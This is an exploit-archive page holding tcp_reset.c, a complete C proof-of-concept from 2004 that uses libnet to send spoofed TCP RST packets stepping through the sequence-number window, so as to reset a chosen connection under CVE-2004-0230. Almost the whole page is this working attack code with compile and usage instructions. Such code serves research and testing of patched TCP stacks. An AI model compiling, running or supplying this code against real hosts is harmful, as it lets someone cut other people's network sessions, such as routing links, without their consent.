Exploit the possiblities

tcp_reset.c

tcp_reset.c
Posted Apr 28, 2004
Authored by eazy

Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson.

tags | exploit, tcp, proof of concept
advisories | CVE-2004-0230
MD5 | 2edd0e1dafca116fdae393cd4f64c383

tcp_reset.c

Change Mirror Download
/*
* tcp_reset.c: Proof of concept exploit that demonstrates the vulnerability described
* by Paul A. Watson in his paper "Slipping In The Window: TCP Reset Attacks"
*
* You need libnet 1.1.x
*
* Compile:
* gcc tcp_reset.c -o tcp_reset -lnet
*
* By: eazy <eazy@ondaquadra.org>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <libnet.h>

void
usage(char *prog)
{
fprintf(stderr, "Usage: %s -s <src ip> -d <dst ip> -p <src port> -q <dst port> [-n <seq>] [-w <window size>] [-t <timeout>]\n"
"\t-s\tsource ip address\n"
"\t-d\tdestination ip address\n"
"\t-p\tsource port\n"
"\t-q\tdestination port\n"
"\t-n\tinitial sequence number (default random)\n"
"\t-w\twindow size (default 1000)\n"
"\t-t\tpacket timeout (default 10000 usec)\n"
,prog);
exit(-1);
}

int
main(int argc, char **argv)
{

int c, build_ip, opt, win = 1000, timeout = 10000;
unsigned short src_port = 0, dst_port = 0;
unsigned long src_ip = 0, dst_ip = 0, seq = 0;
libnet_t *l;
libnet_ptag_t tcp, ip;
struct libnet_stats stat;
char errbuf[LIBNET_ERRBUF_SIZE];

memset(&stat, 0, sizeof(stat));

if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "Libnet_init error: %s\n", errbuf);
exit(-1);
}
while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1)
switch (opt) {
case 's':
src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'd':
dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'p':
src_port = atoi(optarg);
break;
case 'q':
dst_port = atoi(optarg);
break;
case 'n':
seq = strtoul(optarg, NULL, 0);
break;
case 'w':
win = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'h':
case '?':
usage(argv[0]);
}

if (optind < argc)
usage(argv[0]);

if (!src_ip || !dst_ip || !src_port || !dst_port)
usage(argv[0]);

if (!seq) {
libnet_seed_prand(l);
seq = libnet_get_prand(LIBNET_PRu32);
}
for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) {

tcp = libnet_build_tcp(
src_port, /* source port */
dst_port, /* destination port */
seq, /* sequence number */
0, /* acknowledgement num */
TH_RST, /* control flags */
31337, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */

if (tcp == -1) {
fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l));
goto bad;
}
if (build_ip) {
build_ip = 0;
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H, /* length */
0, /* TOS */
666, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */

if (ip == -1) {
fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l));
goto bad;
}
}
if ((c = libnet_write(l)) == -1) {
fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l));
goto bad;
}
usleep(timeout);
}

libnet_stats(l, &stat);
fprintf(stderr, "Packets sent: %d (%d bytes)\n"
"Packet errors: %d\n",
stat.packets_sent, stat.bytes_written, stat.packet_errors);
libnet_destroy(l);
exit(0);

bad:
libnet_destroy(l);
exit(-1);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    1 Files
  • 22
    Jan 22nd
    15 Files
  • 23
    Jan 23rd
    12 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close